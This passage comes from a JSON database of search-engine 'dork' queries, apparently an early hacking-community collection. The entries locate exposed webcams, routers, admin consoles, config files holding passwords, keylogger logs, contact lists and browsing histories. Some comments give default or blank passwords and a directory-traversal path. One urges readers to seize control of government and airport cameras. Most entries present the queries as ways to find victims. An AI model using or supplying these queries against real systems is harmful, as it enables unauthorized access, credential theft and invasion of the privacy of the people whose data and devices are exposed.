JetDirect).", "submited": "2004-12-13", "request": "inurl:\":631/printers\" -php -demo", "id": 765}, {"short description": "ext:dat bpk.dat", "long description": "Perfect Keylogger is as the name says a keylogger :)This dork finds the corresponding datafiles which can be read with the free downloadable lite version.", "submited": "2004-12-13", "request": "ext:dat bpk.dat", "id": 766}, {"short description": "intitle:\"iVISTA.Main.Page\"", "long description": "And again another webcam search. MOst of these cams seem to be security cams", "submited": "2004-12-13", "request": "intitle:\"iVISTA.Main.Page\"", "id": 767}, {"short description": "inurl:2506/jana-admin", "long description": "The JanaServer 2 is amongst other things a proxy server, that makes it possible for LAN members, everyone or a group as a part of the LAN, to access the internet via a Modem, ISDN or DSL connection. For this the program must be installed on the computer, that can access the internet by an installed modem, ISDN or a DSL adapter.", "submited": "2004-12-13", "request": "inurl:2506/jana-admin", "id": 768}, {"short description": "intitle:\"Spam Firewall\" inurl:\"8000/cgi-bin/index.cgi\"", "long description": "The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. 
It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization.", "submited": "2004-12-13", "request": "intitle:\"Spam Firewall\" inurl:\"8000/cgi-bin/index.cgi\"", "id": 769}, {"short description": "inurl:ds.py", "long description": "Affordable Web-based document and content management application lets businesses of every size rapidly deploy a world-class Enterprise Content Management (ECM) solution to help reduce costs, optimize information flow, and reduce risk", "submited": "2004-12-13", "request": "inurl:ds.py", "id": 770}, {"short description": "inurl:\"1220/parse_xml.cgi?\"", "long description": "Quicktime streaming server is uhhhhh.....well it's a streaming server and it can be managed via http. No need to say more. Darwin Streaming Server is the opensource version (for *NUX os's).Some are pass protected, others not.", "submited": "2004-12-10", "request": "inurl:\"1220/parse_xml.cgi?\"", "id": 771}, {"short description": "intitle:\"MX Control Console\" \"If you can't remember\"", "long description": "MX Logics customizable and easy-to-use MX Control ConsoleSM is a centralized email threat management policy platform that provides you with one interface for managing all corporate-wide email threats, protection and security. With the MX Control Console, you can easily configure and control your email protection and security based on your overall corporate email policies.", "submited": "2004-12-19", "request": "intitle:\"MX Control Console\" \"If you can't remember\"", "id": 772}, {"short description": "intext:\"Welcome to the Web V.Networks\" intitle:\"V.Networks [Top]\" -filetype:htm", "long description": "see and control JVC webcameras, you can move the camera, zoom... 
change the settings, etc....", "submited": "2004-12-07", "request": "intext:\"Welcome to the Web V.Networks\" intitle:\"V.Networks [Top]\" -filetype:htm", "id": 773}, {"short description": "intitle:\"WebLogic Server\" intitle:\"Console Login\" inurl:console", "long description": "BEA WebLogic Server 8.1 provides an industrial-strength application infrastructure for developing, integrating, securing, and managing distributed service-oriented applications. By simplifying and unifying the enterprise infrastructure, IT organizations can now deliver greater value in less time, at reduced cost to the overall business.", "submited": "2004-12-19", "request": "intitle:\"WebLogic Server\" intitle:\"Console Login\" inurl:console", "id": 774}, {"short description": "ext:conf inurl:rsyncd.conf -cvs -man", "long description": "rsync is an open source utility that provides fast incremental file transfer.rsync can also talk to \"rsync servers\" which can provide anonymous or authenticated rsync.The configuration files contain data about peers and paths", "submited": "2004-12-19", "request": "ext:conf inurl:rsyncd.conf -cvs -man", "id": 775}, {"short description": "inurl:\"phpOracleAdmin/php\" -download -cvs", "long description": "phpOracleAdmin is intended to be a webbased Oracle Object Manager.In many points alike phpMyAdmin, it should offer more comfort and possibilities. Interestingly these managers are not password protected.", "submited": "2004-12-19", "request": "inurl:\"phpOracleAdmin/php\" -download -cvs", "id": 776}, {"short description": "inurl:1810 \"Oracle Enterprise Manager\"", "long description": "Enterprise Manager 10g Grid Control provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. 
Grid Control is also extensible via an SDK so customers can use it to monitor additional components that are not supported out-of-the box.", "submited": "2004-12-19", "request": "inurl:1810 \"Oracle Enterprise Manager\"", "id": 777}, {"short description": "\"Powered by Invision Power File Manager\" (inurl:login.php) | (intitle:\"Browsing directory /\" )", "long description": "Invision Power File Manager is a popular file management script, written in the popular PHP Scripting Language. It is compatiable with all forms of Unix and Windows and allows the user to control their files via any modern browser.", "submited": "2004-12-19", "request": "\"Powered by Invision Power File Manager\" (inurl:login.php) | (intitle:\"Browsing directory /\" )", "id": 778}, {"short description": "intitle:\"Novell Web Services\" intext:\"Select a service and a language.\"", "long description": "\"Novell GroupWise is an enterprise collaboration system that provides secure e-mail, calendaring, scheduling, and instant messaging. GroupWise also includes task management, contact management, document management, and other productivity tools. GroupWise can be used on your desktop on Linux, Windows*, or Macintosh; in a Web browser anywhere you have an Internet connection; and even on wireless devices. Your GroupWise system can be set up on, Linux, Windows, or any combination of these operating systems.\"", "submited": "2004-12-19", "request": "intitle:\"Novell Web Services\" intext:\"Select a service and a language.\"", "id": 779}, {"short description": "ext:php intext:\"Powered by phpNewMan Version\"", "long description": "PHP News Manager is a multi-platform compatible solution for managing websites and multi-user access. Features weekly poll management, gallery management, partners list management, public news support, and a lot more. PHP News Manager is vulnerable to a directory traversal problem. 
path/to/news/browse.php?clang=../../../../../../file/i/want", "submited": "2004-12-19", "request": "ext:php intext:\"Powered by phpNewMan Version\"", "id": 780}, {"short description": "intitle:\"Cayman-DSL.home\"", "long description": "Cayman DSL modems. Many Cayman units have a weakness where even if remote administration is disabled, some older firmwares will still allow validation if proper login credentials are supplied. In many cases, simply hitting enter will be enough to authenticate. It's worth noting, many of the vulnerable devices also support telnet right out of the box, as opposed to the linksys models which require a firmware patch.", "submited": "2004-12-19", "request": "intitle:\"Cayman-DSL.home\"", "id": 781}, {"short description": "intitle:\"Index of /CFIDE/\" administrator", "long description": "With ColdFusion, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP.The search that pulls up directory listings we probably shouldn't be seeing.. entering the 'administrator' directory brings up a ColdFusion login screen", "submited": "2004-12-19", "request": "intitle:\"Index of /CFIDE/\" administrator", "id": 782}, {"short description": "intitle:\"Athens Authentication Point\"", "long description": "Athens is an Access Management system for controlling access to web based subscription services. 
It offers: * secure single username access to multiple web-based access controlled services * devolved administration facilities at organisation level * remote access user accounts * encrypted account bulk upload facilities * scalable services with 3 million accounts * replication facilities at several separate physical locations, offering a resilient authentication service", "submited": "2004-12-19", "request": "intitle:\"Athens Authentication Point\"", "id": 783}, {"short description": "ext:ini eudora.ini", "long description": "Well, this is the configuration file for Eudora...may contain sensitive information like pop servers, logins and encypted passwords sometimes.", "submited": "2004-12-19", "request": "ext:ini eudora.ini", "id": 784}, {"short description": "inurl:preferences.ini \"[emule]\"", "long description": "This finds the emule configuration file which contains some general and proxy information.Sometimes proxy user and password are stored.", "submited": "2004-12-19", "request": "inurl:preferences.ini \"[emule]\"", "id": 785}, {"short description": "intitle:index.of abyss.conf", "long description": "These directories reveal the configuration file of the abyss webserver. These files can contain passwords.", "submited": "2004-12-19", "request": "intitle:index.of abyss.conf", "id": 786}, {"short description": "intitle:Login intext:\"RT is Copyright\"", "long description": "RT is an enterprise-grade ticketing system which enables a group of people to intelligently and efficiently manage tasks, issues, and requests submitted by a community of users.Versions including 2.0.13 are vulnerable to injection, check outSecurityFocus BID 7509", "submited": "2004-12-19", "request": "intitle:Login intext:\"RT is Copyright\"", "id": 787}, {"short description": "intext:\"\"BiTBOARD v2.0\" BiTSHiFTERS Bulletin Board\"", "long description": "The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database. 
The password file can be retrieve from/admin/data_passwd.dat", "submited": "2004-12-19", "request": "intext:\"\"BiTBOARD v2.0\" BiTSHiFTERS Bulletin Board\"", "id": 788}, {"short description": "intitle:\"welcome.to.squeezebox\"", "long description": "squeezebox is the easiest way for music lovers to enjoy high-quality playback of their whole digital music collection. Stream music from your computer to anywhere in your home. Works with iTunes and provides a powerful web interface for control from any computer on your network.This is neat, on top of giving out all sorts of enumeration information, it also allows one to paruse the music collection on the box, as well as listen if you install the aplet. Way cool.", "submited": "2004-12-19", "request": "intitle:\"welcome.to.squeezebox\"", "id": 789}, {"short description": "allinurl:\"/*/_vti_pvt/\" | allinurl:\"/*/_vti_cnf/\"", "long description": "Frontpage extensions for Unix ? So be it..", "submited": "2004-12-29", "request": "allinurl:\"/*/_vti_pvt/\" | allinurl:\"/*/_vti_cnf/\"", "id": 790}, {"short description": "", "long description": "some of the sites are very, very interesting - try a search substituting site:gov instead of site:com, or try site:edu or site:org or site:fm. Anyway, camera servers made by Axis Video, you can look up administrator manuals online via the following search string (guess what you might find there?):site:com inurl:axis video server manualsCan you say default UID and PW?What's really interesting is if you look hard enough; you can find cameras within government and educational labs; airport surveillance; even some stretches of I65 in the US (for those of you close to the Ohio River area).Anyway this search string gets you into the server; from there you can have many controls or few controls over the cameras (including zoom, pan, and iris). 
There is much to see and most of the cameras have easy acccess to admin profile via click of a button - of course from there you have to provide a UID & PW. But read up on the manuals any you may get lucky.Bottom line, if you can control the camera (via admin priv.) you can control what and when the camera & server view as well as what & when they record. Just a small seed for a possibly big idea - your ambitions may vary.Rate it! Give me feedback! I will not learn without some form of criticism...yet despite how insignificant that criticism may make me feel...i enjoy the search for the unseen/unknown knowledge nonetheless...it was worth it.", "submited": "2004-12-08", "request": "", "id": 791}, {"short description": "filetype:cnf inurl:_vti_pvt access.cnf", "long description": "The access.cnf file is a \"weconfigfile\" (webconfig file) used by Frontpage Extentions for Unix. The install script called change_server.sh processes them. These files leak information about the realm name and the full path on the server for it.", "submited": "2004-12-30", "request": "filetype:cnf inurl:_vti_pvt access.cnf", "id": 792}, {"short description": "inurl:\"install/install.php\"", "long description": "This searches for the install.php file. Most results will be a Bulletin board like Phpbb etc.This will let an attacker install the forum again. There is an exploit available on the Net which lets you see DB info.", "submited": "2004-12-29", "request": "inurl:\"install/install.php\"", "id": 793}, {"short description": "intitle:\"index of\" inurl:ftp (pub | incoming)", "long description": "Adding \"inurl:ftp (pub | incoming)\" to the \"index.of\" searches helps locating ftp websites. 
This query can easily be narrowed further with additional keywords.", "submited": "2004-12-30", "request": "intitle:\"index of\" inurl:ftp (pub | incoming)", "id": 794}, {"short description": "filetype:blt \"buddylist\"", "long description": "AIM buddylists.", "submited": "2004-12-30", "request": "filetype:blt \"buddylist\"", "id": 795}, {"short description": "intitle:\"index.of\" .diz .nfo last modified", "long description": "File_id.diz is a description file uploaders use to describe packages uploaded to FTP sites. Although rooted in legitimacy, it is used largely by software piracy groups to describe their ill-gotten goods. Systems administrators finding file_id.diz in directory listings on their servers may discover their boxes have been hacked and are being used as a distribution site for pirated software. .nfo's often contain info on which piracy group the files have passed through on their way to their final resting place. This helps weed out false positives.", "submited": "2004-12-30", "request": "intitle:\"index.of\" .diz .nfo last modified", "id": 796}, {"short description": "intitle:\"Sipura.SPA.Configuration\" -.pdf", "long description": "Query returns configuration pages for online Voice over IP devices. 
Discloses an obscene amount of information about the target, including most all routing information and access to control user's telephone system.", "submited": "2004-12-30", "request": "intitle:\"Sipura.SPA.Configuration\" -.pdf", "id": 797}, {"short description": "intitle:\"Azureus : Java BitTorrent Client Tracker\"", "long description": "This query shows machines using the Azureus BitTorrent client's built-in tracker - the pages are quite simple in the information they give out, simply a list of active torrents.This information may be useful for people wanting to find active BitTorrent trackers for downloading .torrent files from, or for people wanting to find these trackers to shut them down :)", "submited": "2004-12-30", "request": "intitle:\"Azureus : Java BitTorrent Client Tracker\"", "id": 798}, {"short description": "intitle:\"BNBT Tracker Info\"", "long description": "This query shows pages which summarise activity on BNBT-powered BitTorrent trackers - including all the torrents currently being \"tracked\", the BNBT software version, links to user-lists and 'admin' pages, etc.This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. It is also useful for people wanting to gain some clues into a tracker's/site's setup. Some versions of BNBT are also vulnerable to a DOS attack. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!", "submited": "2004-12-30", "request": "intitle:\"BNBT Tracker Info\"", "id": 799}, {"short description": "intitle:\"PHPBTTracker Statistics\" | intitle:\"PHPBT Tracker Statistics\"", "long description": "This query shows pages which summarise activity on PHPBT-powered BitTorrent trackers - all the torrents currently being \"tracked\".This is useful to people who want to find active BitTorrent trackers for downloading - including ones which aren't 'public'. 
It is also useful for people wanting to gain some clues into a tracker's/site's setup. People targetting BitTorrent trackers because of the questionable legality of their general usage may also find this query useful!Often, the URL involved can be changed to access the configuration / installation / deletion script.. which are obviously *not* intended for public access, even if the statistics page is.", "submited": "2004-12-30", "request": "intitle:\"PHPBTTracker Statistics\" | intitle:\"PHPBT Tracker Statistics\"", "id": 800}, {"short description": "\"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraq", "long description": "Query: \"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraqBackground: WordPress is a blogging software which is vulnerable to a few SQL injection queries.http://securityfocus.com/bid/12066/exploit/", "submited": "2005-01-02", "request": "\"Powered by WordPress\" -html filetype:php -demo -wordpress.org -bugtraq", "id": 801}, {"short description": "intitle:upload inurl:upload intext:upload -forum -shop -support -w3c", "long description": "The search reveals server upload portals.An attacker can use server space for his own benefit.", "submited": "2005-01-01", "request": "intitle:upload inurl:upload intext:upload -forum -shop -support -w3c", "id": 802}, {"short description": "intitle:\"SpeedStream * Management Interface\"", "long description": "a lot of Speed stream routers :)", "submited": "2005-01-08", "request": "intitle:\"SpeedStream * Management Interface\"", "id": 803}, {"short description": "intitle:\"HFS /\" +\"HttpFileServer\"", "long description": "\"The HttpFileServer is a Java based mechanism for providing web access to a set of files on a server. 
This is very similar to Apache Directory Indexing but provides the ability to upload files as well.\" http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=1516", "submited": "2005-01-05", "request": "intitle:\"HFS /\" +\"HttpFileServer\"", "id": 804}, {"short description": "inurl:\"next_file=main_fs.htm\" inurl:img inurl:image.cgi", "long description": "Linksys Wireless-G web cams.", "submited": "2004-12-30", "request": "inurl:\"next_file=main_fs.htm\" inurl:img inurl:image.cgi", "id": 805}, {"short description": "\"There are no Administrators Accounts\" inurl:admin.php -mysql_fetch_row", "long description": "This is a more specific search for the vulnerable PhpNuke index already seen on this website.PhpNuke asks you to set up an admin account when it is first installed. This search is a list of people who never set up that account! It will take you directly to the administrator registration of a vulnerable server. The -mysql_fetch_row will remove listings where SQL is simply broken.", "submited": "2004-12-27", "request": "\"There are no Administrators Accounts\" inurl:admin.php -mysql_fetch_row", "id": 806}, {"short description": "filetype:ctt Contact", "long description": "This is for MSN Contact lists...", "submited": "2005-01-02", "request": "filetype:ctt Contact", "id": 807}, {"short description": "Peoples MSN contact lists", "long description": "This will give msn contact lists .. modify the \"msn\" to what ever you feel is messenger related", "submited": "2005-01-02", "request": "filetype:ctt \"msn\"", "id": 808}, {"short description": "inurl:servlet/webacc", "long description": "I was playing around on the net when I found a small problem with Novell's WebAcces. 
With User.lang you can give in you're language as parameter I tried some different stuff there and when I tried so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang=\"> this link appeared I clicked it and so I found unprotected dirs.In hxxp://www.notsohappyserver.com/com/novell/webaccess/ is a file called WebAccessUninstall.ini and this file contains info like servernames installationpaths and servers context", "submited": "2005-01-06", "request": "inurl:servlet/webacc", "id": 809}, {"short description": "\"Web File Browser\" \"Use regular expression\"", "long description": "This will ask google to search for a php script used to manage files on a server. The script \"Web File Browser\" enables users to change files on the server. The script comes un-protected, which means that anyone who knows the exact path of the php file can have admin access to files on that server.", "submited": "2005-01-07", "request": "\"Web File Browser\" \"Use regular expression\"", "id": 810}, {"short description": "intext:gmail invite intext:http://gmail.google.com/gmail/a", "long description": "This is a dork I did today. At first, I wanted to find out the formula for making one, but ... It got boring, so I just made a dork that finds invites. If you want to get specific, try adding \"+blog\", \"+livejournal\", or , \"+forum\".", "submited": "2005-01-02", "request": "intext:gmail invite intext:http://gmail.google.com/gmail/a", "id": 811}, {"short description": "filetype:cgi transcoder.cgi", "long description": "Digital Video Recorder by SnapStream. It is possible on misconfigured machines to stream video off these devices.", "submited": "2005-01-11", "request": "filetype:cgi transcoder.cgi", "id": 812}, {"short description": "intitle:\"Setup Home\" \"You will need * log in before * * change * settings\"", "long description": "This should reveal Belkin routers. 
Interestingly, Belkin routers by default have remote administration on, and act as a webserver for administration. Also by default, their password is blank (and the login page helpfully informs the attacker of this). Once he's in, there's all kinds of annoying stuff he could get into, and it could also be used more blackhackishly to disable security.", "submited": "2005-01-10", "request": "intitle:\"Setup Home\" \"You will need * log in before * * change * settings\"", "id": 813}, {"short description": "\"Index of\" rar r01 nfo Modified 2004", "long description": "New Warez Directory Lists", "submited": "2005-01-09", "request": "\"Index of\" rar r01 nfo Modified 2004", "id": 814}, {"short description": "intitle:\"Network Print Server\" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )", "long description": "Axis Network Print Server devices. This search has all the possible urls (more than strictly needed), but those are added in case Google decides to index them in the future.", "submited": "2005-01-12", "request": "intitle:\"Network Print Server\" filetype:shtm ( inurl:u_printjobs | inurl:u_server | inurl:a_server | inurl:u_generalhelp | u_printjobs )", "id": 815}, {"short description": "intitle:\"Network Print Server\" intext:\"http://www.axis.com\" filetype:shtm", "long description": "Axis Network Print Server devices (a better shorter search).", "submited": "2005-01-12", "request": "intitle:\"Network Print Server\" intext:\"http://www.axis.com\" filetype:shtm", "id": 816}, {"short description": "\"pcANYWHERE EXPRESS Java Client\"", "long description": "This search will reveal the java script program that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. 
Still this is extremely dangerous to have exposed to the web.", "submited": "2005-01-15", "request": "\"pcANYWHERE EXPRESS Java Client\"", "id": 817}, {"short description": "inurl:\"Activex/default.htm\" \"Demo\"", "long description": "This search will reveal the active X plugin page that allows someone to access PC Anywhere from, well, anywhere! This should primarily be considered as a frontdoor, as most PC Anywhere servers are password protected. Still this is extremely dangerous to have exposed to the web.", "submited": "2005-01-15", "request": "inurl:\"Activex/default.htm\" \"Demo\"", "id": 818}, {"short description": "intitle:\"FTP root at\"", "long description": "This dork will return some FTP root directories. The string can be made more specific by adding additional keywords like password.", "submited": "2005-01-13", "request": "intitle:\"FTP root at\"", "id": 819}, {"short description": "intitle:\"VNC viewer for Java\"", "long description": "VNC (Virtual Network Computing) allows a pc to be controlled remotely over the Internet. These are the password protected but still shouldn't be allowed to be indexed by Google by accident.", "submited": "2005-01-15", "request": "intitle:\"VNC viewer for Java\"", "id": 820}, {"short description": "filetype:torrent torrent", "long description": "Torrent files .. don't expect to find spectacular stuff with this kind of string, this just to shows you can use Google for all kinds of filetypes, not just pdf or html..", "submited": "2005-01-16", "request": "filetype:torrent torrent", "id": 821}, {"short description": "inurl:\"631/admin\" (inurl:\"op=*\") | (intitle:CUPS)", "long description": "Administration pages for CUPS, The Common UNIX Printing System. 
Most are password protected.", "submited": "2005-01-18", "request": "inurl:\"631/admin\" (inurl:\"op=*\") | (intitle:CUPS)", "id": 822}, {"short description": "PHPhotoalbum Upload", "long description": "Homepage: http://www.stoverud.com/PHPhotoalbum/PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums.", "submited": "2005-01-13", "request": "intitle:\"PHPhotoalbum - Upload\" | inurl:\"PHPhotoalbum/upload\"", "id": 823}, {"short description": "PHPhotoalbum Statistics", "long description": "PHPhotoalbum is a picturegallery script. You can upload pictures directly from your webbrowser. The script generates thumbnails on the fly. Users can comment each picture. View statistics about the pictures. TopXX list. Admin user can delete pictures, comments and albums.", "submited": "2005-01-13", "request": "inurl:PHPhotoalbum/statistics intitle:\"PHPhotoalbum - Statistics\"", "id": 824}, {"short description": "PhotoPost PHP Upload", "long description": "PhotoPost was designed to help you give your users exactly what they want. Your users will be thrilled to finally be able to upload and display their photos for your entire community to view and discuss, all with no more effort than it takes to post a text message to a forum.Over 3,500 web sites are powered by PhotoPost today. These customers trusted our software to simplify their lives as webmasters, and to meet the needs of their users.", "submited": "2005-01-13", "request": "-Login inurl:photopost/uploadphoto.php", "id": 825}, {"short description": "uploadpics.php?did= -forumintext:Generated.by.phpix.1.0? inurl:$mode=album", "long description": "Product: PHPix Version: 1.0Vuln: Directory traversalPHPix is a Web-based photo album viewer written in PHP. 
It features automatic generation of thumbnails and different resolution files for viewing on the fly. Synnergy Labs has found a flaw within PHPix that allows a user to successfully traverse the file system on a remote host, allowing arbitrary files/folders to be read. http://www.securiteam.com/unixfocus/6G00K0K04K.html", "submited": "2005-01-21", "request": "intext:Generated.by.phpix.1.0? inurl:$mode=album", "id": 826}, {"short description": "XAMPP \"inurl:xampp/index\"", "long description": "XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. At the moment there are three XAMPP distributions.-allows you to write emails (mercury Mail)-some phpmyadmin are unprotected-security details of the server-maybe some more things ;-)", "submited": "2005-01-21", "request": "XAMPP \"inurl:xampp/index\"", "id": 827}, {"short description": "intitle:\"Browser Launch Page\"", "long description": "An ActiveX based webcam - so use MS IE", "submited": "2005-01-21", "request": "intitle:\"Browser Launch Page\"", "id": 828}, {"short description": "intext:\"Mail admins login here to administrate your domain.\"", "long description": "Another way to locate Postfix admin logon pages.", "submited": "2005-01-24", "request": "intext:\"Mail admins login here to administrate your domain.\"", "id": 829}, {"short description": "inurl:citrix/metaframexp/default/login.asp? ClientDetection=On", "long description": "Citrix (http://citrix.com) is a web application that allows remote access via a client for companies, institutions, and government agencies to \"published\" folders, files, drives, and applications on the server and often the attached network. There is a XSS vulnerability in a widely used version of their Web Interface. 
As reported on Securiteam.com: http://www.securiteam.com/securitynews/6X0020K8VW.html A simple test is included in the advisory.", "submited": "2005-01-20", "request": "inurl:citrix/metaframexp/default/login.asp? ClientDetection=On", "id": 830}, {"short description": "ext:txt inurl:dxdiag", "long description": "This will find text dumps of the DirectX Diag utility. It gives an outline of the hardware of the computer, and goes into quite a bit of detail listing driver versions and such. I can't think of any serious security implications of this data, but I'll leave it to your imagination.", "submited": "2005-01-22", "request": "ext:txt inurl:dxdiag", "id": 831}, {"short description": "inurl:\"usysinfo?login=true\"", "long description": "Dell OpenManage enables remote execution of tasks such as system configuration, imaging, application installation and support. It is also used to track hardware and software inventory, to update configurations, drivers, OS and applications and to proactively monitor and correct fault conditions. Dell OpenManage standards include the Common Information Model (CIM), Desktop Management Interface (DMI), Simple Network Management Protocol (SNMP), and Wired for Management (WfM). Another possible search for this is: \"Log in.\" inurl:1311/servlet/", "submited": "2005-01-25", "request": "inurl:\"usysinfo?login=true\"", "id": 832}, {"short description": "inurl:\"/NSearch/AdminServlet\"", "long description": "This search brings up results for Novell NetWare's Web Search Manager.. 
at best the sites will be password protected, at worst the site will require no authentication - allowing full control over a site's 'virtual search servers'.", "submited": "2005-01-26", "request": "inurl:\"/NSearch/AdminServlet\"", "id": 833}, {"short description": "\"Netware * Home\" inurl:nav.html", "long description": "Rather than submitting various searches for all kinds of NetWare related pages, Novell NetWare's Home Page is a good place to start for profiling the services available on a NetWare powered system. The results will often include all (or at least some) of the following links to different services on a system - including Server Certificates, iFolder, iManager, NetStorage, Enterprise Web Server Management and the Web Search Manager!", "submited": "2005-01-26", "request": "\"Netware * Home\" inurl:nav.html", "id": 834}, {"short description": "intext:\"Error Message : Error loading required libraries.\"", "long description": "This throws up pages which contain \"CGI ERROR\" reports - which include the file (and line number) of the errors occurence, the version of Perl being used, detailed server information (of the form \"Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.2 mod_perl/1.26\"), usernames, setup file names, form / query information, port and path information, etc.. perfect for system-profiling!", "submited": "2005-01-26", "request": "intext:\"Error Message : Error loading required libraries.\"", "id": 835}, {"short description": "ext:reg \"username=*\" putty", "long description": "Putty registry entries. Contain username and hostname pairs, as well as type of session (sftp, xterm, etc).", "submited": "2005-01-27", "request": "ext:reg \"username=*\" putty", "id": 836}, {"short description": "allinurl:index.htm?cus?audio", "long description": "This will find webcams made by Sweex, Orite and others. Supports motion detection, ftp, smtp and save to .avi. 
Needs ActiveX so works for IE/win only ..", "submited": "2005-01-27", "request": "allinurl:index.htm?cus?audio", "id": 837}, {"short description": "intitle:\"edna:streaming mp3 server\" -forums", "long description": "Edna allows you to access your MP3 collection from any networked computer. This software streams your MP3s via HTTP to any MP3 player that supports playing off a remote connection (e.g. Winamp, FreeAmp, Sonique, XMMS).Stats pages were found (by klouw) with:\"edna:*\" intitle:\"edna: Site Statistics\"", "submited": "2005-01-27", "request": "intitle:\"edna:streaming mp3 server\" -forums", "id": 838}, {"short description": "intitle:\"ePowerSwitch Login\"", "long description": "With ePowerSwitch D4 Guard, up to four devices can be individually switched on and off, also with programmed switching states. The activated Guard function ensures exceptionally high equipment availability: continually monitors whether the connected IP-based devices are still active, it can automatically, without user input, reboot any crashed device.", "submited": "2005-01-27", "request": "intitle:\"ePowerSwitch Login\"", "id": 839}, {"short description": "ext:ini Version=4.0.0.4 password", "long description": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more. 
This is a more specific search for ServU passwords base on a previous dork by Cybercide.", "submited": "2005-01-27", "request": "ext:ini Version=4.0.0.4 password", "id": 840}, {"short description": "inurl:orasso.wwsso_app_admin.ls_login", "long description": "Oracle provides a Single Sign-On solution which is quite widely spread as it integrates quite seemlessly into exisitng appllications (as Oracle says).If the link itself shows an empty page, try the directory below.", "submited": "2005-01-27", "request": "inurl:orasso.wwsso_app_admin.ls_login", "id": 841}, {"short description": "inurl:oraweb -site:oraweb.org", "long description": "Oracle administrators tend to naming their servers ora* - maybe because they forget the name of their database all the time.So the Oracle webserver is very often named oraweb.", "submited": "2005-01-27", "request": "inurl:oraweb -site:oraweb.org", "id": 842}, {"short description": "intitle:Group-Office \"Enter your username and password to login\"", "long description": "Group-Office is a Groupware suite containing a base system and different modules. The modules are designed in a way that groups of people can collaborate online.", "submited": "2005-01-27", "request": "intitle:Group-Office \"Enter your username and password to login\"", "id": 843}, {"short description": "inurl:\"8003/Display?what=\"", "long description": "Norton AntiVirus for GatewaysEasily administered from anywhere via an HTML interface, it scans compressed and encoded files at the SMTP gateway, including a nearly unlimited number of file extensions in ZIP, UUENCODE, and MIME formats. 
Administrators have flexible options for handling infected files, scheduling virus definition updates via LiveUpdate, and generating reports.", "submited": "2005-01-27", "request": "inurl:\"8003/Display?what=\"", "id": 844}, {"short description": "intitle:\"EverFocus.EDSR.applet\"", "long description": "The new EDSR-1600 (16-channel), EDSR-900 (9-channel) and EDSR-600 (6-channel) digital video recorders offer all digital video recording benefits and are easy to install and operate like a custom VCR. Moreover, the 16 & 9 channel devices are the first Digital Video Recorders with an integrated 16x4 basic matrix function. Existing multiplexers can be connected via a switch output. Alarms are managed via external alarm inputs and outputs.", "submited": "2005-01-27", "request": "intitle:\"EverFocus.EDSR.applet\"", "id": 845}, {"short description": "inurl:netscape.ini", "long description": "There's a bunch of interesting info in netscape.ini1. Viewers: which multimedia viewers the firm or people are using2.Cookies3.Address Book4.Mail- If pop3 is used you will see login and password. 
5.Java - will tell the attacker if his victim has Java enabled.6.URL History - The last sites visitedURL_1=http://edtech.xxxx.fi/URL_2=C:\\Tx\\ixxx_t3.htmURL_3=http://www.xxx.com/welcome/URL_4=http://xxx.netscape.com7.User Trusted External Applications", "submited": "2005-01-27", "request": "inurl:netscape.ini", "id": 846}, {"short description": "inurl:netscape.hst", "long description": "Netscape Bookmark List/History: So an attacker would be able to locate the bookmark and history list", "submited": "2005-01-27", "request": "inurl:netscape.hst", "id": 847}, {"short description": "inurl:\"bookmark.htm\"", "long description": "Bookmarks for Netscape and various other browsers.", "submited": "2005-01-27", "request": "inurl:\"bookmark.htm\"", "id": 848}, {"short description": "inurl:netscape.hst", "long description": "History for Netscape - So an attacker can read a user's browsing history.", "submited": "2005-01-27", "request": "inurl:netscape.hst", "id": 849}, {"short description": "\"powered | performed by Beyond Security's Automated Scanning\" -kazaa -example", "long description": "This search finds Beyond Security reports. Beyond Security sells a box which performs automated testing (the product is based on Nessus). The Beyond Security report will help an attacker find vulnerabile services at the attackees site.This dork was found by Jamuse. A cleanup was done by Wolveso. Please note: Both current (feb 2005) results are verifiable as samples - they're linked from pages on the sites they belong to, as sample reports. 
But you never know when Google might find some real one's to play with ?!", "submited": "2005-02-03", "request": "\"powered | performed by Beyond Security's Automated Scanning\" -kazaa -example", "id": 850}, {"short description": "intitle:\"EpsonNet WebAssist Rev\"", "long description": "This reveals the Epson Web Assist page (internal to the machine)", "submited": "2005-01-28", "request": "intitle:\"EpsonNet WebAssist Rev\"", "id": 851}, {"short description": "\"SquirrelMail version 1.4.4\" inurl:src ext:php", "long description": "date :Jan 30 2005 this search reveal the src/webmail.php which would allow acrafted URL to include a remote web page. This was assigned CAN-2005-0103by the Common Vulnerabilities and Exposures.-what can possibly be done :*A possible cross site scripting issue exists in src/webmail.php that isonly accessible when the PHP installation is running with register_globalsset to On.*A possible local file inclusion issue was uncovered by one of ourdevelopers involving custom preference handlers. This issue is onlyactive if the PHP installation is running with register_globals set to On.", "submited": "2005-01-30", "request": "\"SquirrelMail version 1.4.4\" inurl:src ext:php", "id": 852}, {"short description": "inurl:na_admin", "long description": "This searches for the admin pages for a \"Network Appliance\" box. An authenticated user could get access to a their data - all of it, in fact up to 100's Tb of it. 
